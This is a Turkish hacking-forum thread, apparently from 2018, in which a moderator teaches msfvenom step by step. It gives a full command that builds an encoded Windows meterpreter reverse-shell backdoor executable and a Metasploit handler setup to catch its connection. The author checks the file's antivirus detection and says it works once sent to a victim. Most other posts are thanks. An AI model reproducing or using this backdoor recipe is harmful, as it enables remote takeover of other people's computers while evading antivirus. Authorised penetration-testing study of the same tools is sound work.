İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

[Metαsploit Serisi] MSFVENOM ~Cεys~

Ceys - ait Kullanıcı Resmi (Avatar)
Süper Moderatör
Üyelik tarihi:
04/2016
Mesajlar:
7.026
Konular:
690
Teşekkür (Etti):
144
Teşekkür (Aldı):
3118
Ticaret:
(0) %
11-03-2018 17:07
#1
[Metαsploit Serisi] MSFVENOM ~Cεys~


MSFVENOM NEDİR

Payload oluşturmak için kullandığımız araçtır.
Kali Linux 2.0 sürümünde msfpayload olarak geçiyor fakat yeni sürümlerde msfvenom olarak değiştirme yapılmıştır.
Ben msfvenom komutu ile işlem yapacağım. Diğer komutun bir farkı yoktur.
Payloadlar exploit ile birlikte kullanılır yada tek payload oluşturarak direk kullanabiliriz.
Asıl görevleri sistemde yer edinip emirlerimizi yerine getirmektir.
3 çeşit payload vardır.

Single : Bu bağlantyı sağlar. kurban PCde bazı basit görevleri yerşne getirir.

Stagers : küçük kodlara enjekte olup kendi seçtiği payloadı çalıştıran payloaddır.

Stages : Bu hedefte tüm işlemleri gerçekleştirebilen payloaddır. Hedefe direk enjekte olur ve payload seçer.

PAYLOADIN OLUŞTURULMASI

msfvenom özelliklerini görmek için;

Alıntı:
msfvenom -h
yazarak listeleyebiliriz.
Şimdi bu parametrelerin ne iş yaptığına bakalım..

Alıntı:
-p, --payload <payload> Payload seçmek için kullanılır.
-l, --list [type] Payload listelemek için kullanılır.
-f, --format <format> Çıktının hangi uzantıda olacağını belirler.
-e, --encoder <encoder> Encoder seçimini belirtir.
-a, --arch <arch> payloadın mimarisini belirler.
-s, --space <length> The maximum size of the resulting payload
-b, --bad-chars <list> The list of characters to a**** example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path>
-x, --template <path>
-k, --keep
-o, --out <path>
-v, --var-name <name>
-h, --help yardım komutu



Komut satırına;

Alıntı:
msfvenom -l payloads
yazarak payloadları listeleyebiliriz.



Görüldüğü gibi birçok payload bulunuyor.

şimdi bir payload oluşturalım..

Alıntı:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f exe -a x86 -o /root/Masaüstü/ceys.exe --platform windows -e x86/shikata_ga_nai -i 20
komutunu konsola girerek bir backsoor oluşturalım.
Burda:

Alıntı:
-p ile belirlenen hangi patform üzerinde çalışacağıdır. Biz windows belirledik.
LHOST ve LPORT ile çalışacak port ve Ip adresini yazdık.
-f ile çıktı dosyasının hangi formatta olduğudur. .exe uzantılı yaptık.
-a ile çalıaşcak sistemin özelliğini yazdık.
-o ile dosyamızı nereye kayıt etmek istediğimizi belirledik.
shikata_ga_nai encoderini kullandık.
-i ile 20 defa işlem yapmasını emrettik.


Evet artık dosyamız hazır şimdi biz bu dosyayı test edeceğiz.

me.tasploit penceresiniz açalım ve işlemleri sırasıyla yapalım..

1. gelen bağlantıları dinleyecek handlerimizi belirlemek için;

Alıntı:
use exploit/multi/handler
komutunu çalıştıralım.

2.Şimdi bağlantıyı sağlaaycak olan payloadı seçelim..

Alıntı:
set PAYLOAD windows/meterpreter/reverse_tcp
3.Hangi porttan dinleme apıyorsak onu belirtelim..

Alıntı:
set LPORT 443
4.Gelecek olan diğer bağlantıları reddetmek için

Alıntı:
set ExitOnSession false
yazıyoruz. eğer kabul etmek istiyorsanız hiç bu komutu girmezsiniz.

5. son olarak bekleme moduna geçiyoruz.

Alıntı:
exploit -j -z


bi bunu herhangi bir yere yedirmediğimiz için failled yanıtını verdi. eğer bir kurbana atarsanız orası çalışmaya ve dinleme yapmaya başlayacaktır.

Şimdi bu oluşturduğumuz virüse bir bakalım. kaçtanevirüs var.



https://www.virustotal.com/#/file/ae...0219/detection

sızma ve kontrol işlemleri sonraki konularda ele alınacaktır

Esen kalın ~ Cεys


Konu 'Black Warrior tarafından (16-03-2018 10:19 Saat 10:19 ) değiştirilmiştir.
Ataerimz Teşekkür etti.
Luwexigo - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2017
Mesajlar:
1.846
Konular:
88
Teşekkür (Etti):
53
Teşekkür (Aldı):
619
Ticaret:
(0) %
11-03-2018 17:09
#2
Eline sağlık
---------------------
LUWEXİGO
Security96 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
DARKWEB
Yaş:
20
Mesajlar:
2.817
Konular:
159
Teşekkür (Etti):
265
Teşekkür (Aldı):
291
Ticaret:
(0) %
11-03-2018 17:09
#3
Eline sağlık hocam
---------------------
Kapkaranlık Günler Geri de Kaldı Artık Aydınlıktayım Huzurlu ve dinginim

SaysaMaim
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
2.941
Konular:
86
Teşekkür (Etti):
201
Teşekkür (Aldı):
925
Ticaret:
(0) %
11-03-2018 17:10
#4
Elinize Sağlık Hocam Yine Yararlı Bir Konu
Ceys - ait Kullanıcı Resmi (Avatar)
Süper Moderatör
Üyelik tarihi:
04/2016
Mesajlar:
7.026
Konular:
690
Teşekkür (Etti):
144
Teşekkür (Aldı):
3118
Ticaret:
(0) %
11-03-2018 17:21
#5
Alıntı:
Luwexigo´isimli üyeden Alıntı Mesajı göster
Eline sağlık
Alıntı:
Security96´isimli üyeden Alıntı Mesajı göster
Eline sağlık hocam
Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık Hocam Yine Yararlı Bir Konu
sağolun canlar
Mr.00 - ait Kullanıcı Resmi (Avatar)
Siber İstihbarat Uzmanı (Stajyer)
Üyelik tarihi:
03/2017
Nereden:
Anonim=00
Mesajlar:
1.006
Konular:
32
Teşekkür (Etti):
505
Teşekkür (Aldı):
209
Ticaret:
(0) %
11-03-2018 17:40
#6
Ellerine sağlık
---------------------
-*Intelligence World*-
Efy
Efy - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
Öteki Taraf
Mesajlar:
5.658
Konular:
653
Teşekkür (Etti):
45
Teşekkür (Aldı):
1652
Ticaret:
(0) %
11-03-2018 19:31
#7
Eline emeğine sağlık hocam.
---------------------
Altın harflerle yaz mahlasımı
Kajmer Sagopa

We Got RHYMES
"Kalabalık Bir Dost Listesi Gereksizler En Tepede"
ÇOK ARAYACAKSINIZ

Mahlasım Ekinoks
AquieLL - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
aquu.php
Mesajlar:
4.002
Konular:
629
Teşekkür (Etti):
817
Teşekkür (Aldı):
2294
Ticaret:
(0) %
11-03-2018 19:33
#8
Emeğine sağlık Ceys.
---------------------

WWW.TÜRKHACKTEAM.ORG/TV
- AquieLL -
Siber Güvenlik
AJEXA - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
06/2013
Nereden:
Jüpiter
Mesajlar:
6.925
Konular:
369
Teşekkür (Etti):
1145
Teşekkür (Aldı):
2470
Ticaret:
(0) %
11-03-2018 19:38
#9
Eline emeğine sağlık
Ceys - ait Kullanıcı Resmi (Avatar)
Süper Moderatör
Üyelik tarihi:
04/2016
Mesajlar:
7.026
Konular:
690
Teşekkür (Etti):
144
Teşekkür (Aldı):
3118
Ticaret:
(0) %
11-03-2018 23:43
#10
Alıntı:
AquieLL´isimli üyeden Alıntı Mesajı göster
Emeğine sağlık Ceys.
eyvallah kardeşim sağol

Alıntı:
AJEXA´isimli üyeden Alıntı Mesajı göster
Eline emeğine sağlık
sağolasın bro

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı